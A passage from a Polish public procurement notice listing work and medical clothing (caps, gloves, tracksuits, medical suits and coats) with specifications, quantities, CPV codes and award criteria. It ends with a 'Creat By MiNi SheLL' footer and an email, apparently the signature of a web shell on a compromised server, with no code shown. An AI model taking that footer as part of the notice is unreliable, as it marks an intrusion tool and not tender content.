12.Nakrycie głowy letnie - czapka drelichowa z usztywnionym daszkiem z regulacją obwodu głowy wykonana z tkaniny bawełna poliester.
Norma EN 340.	szt	3
13.Nakrycie głowy zimowe - czapka drelichowa z ocieplaczem typ uszanka 
Norma PN -EN 340, PN - EN 342	szt	3
14.Rękawice ochronne wzmacniane - z podszewką, na części chwytnej 
wzmocnione skórą. Produkt spełniający wymagania dla środków ochrony indywidualnej, oznakowanie CE	szt	100
15.Rękawice robocze wampirki - rękawice powlekane gumą, 100% bawełna, 
odporne na przecieranie, zakończone ściągaczem. Oznakowanie CE	szt	100
16.Spodnie dresowe bez ściągaczy przy nogawkach. Pas gumka i troki. Kolor granatowy	szt	5
17.Koszulki polo z kołnierzykiem. Kolor niebieski	szt	5
Wymagania Zamawiającego
- Zdjęcia katalogowe oferowanych modeli asortymentu
.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.00.00-6, 35.11.34.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Odzież  dla personelu medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Garsonka damska kolorowa - dwuczęściowa (spodnie + żakiet z kieszeniami, bez kołnierzyka, krótki rękaw).
 Konstrukcja odzieży: 65% poliester 35% bawełna, 195 gnam2 - 210gnam2.Kurczliwość max do 2%.
 Odporna na dezynfekcję chemiczną oraz termiczną (temp. prania 90 st C). 
Musi zabezpieczać przed przenikaniem szkodliwych dla zdrowia czynników biologicznych i osiadaniem  ich na skórze.
Spodnie w kolorze seledynowym, niebieskim, różowym, zielonym, turkusowym, łososiowym, ciemna zieleń,czerwony ,granatowy,biały.
Żakiet biały -może mieć akcenty w kolorze spodni Rozmiar 34 - 52
kpl	97
2.Fartuch męski z długim rękawem, zapinany, z kieszeniami; długość fartucha 3przez4.
Konstrukcja odzieży: 65% poliester 35% bawełna 195 gnam2 - 210gnam2. Kurczliwość max do 2%.
Odporna na dezynfekcję chemiczną oraz termiczną (temp. prania 90 st C).
 Musi zabezpieczać przed przenikaniem szkodliwych dla zdrowia czynników biologicznych i osiadaniem ich na skórze. 
Fartuch  w kolorze seledynowym, białym
Rozmiar 34 - 52.szt	10
	Wymagania Zamawiającego
1.	Kolor : do wyboru Zamawiającego
2.	Oznakowanie odzieży metodą haftu:
	- treść  oznakowania GCZD KATOWICE
	Żakiet na kieszonce
	- wszywka informacyjna dotycząca konserwacji oraz rozmiaru
	- instrukcja użytkowania i konserwacji
3. 	Zdjęcia katalogowe oferowanych modeli asortymentu
.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com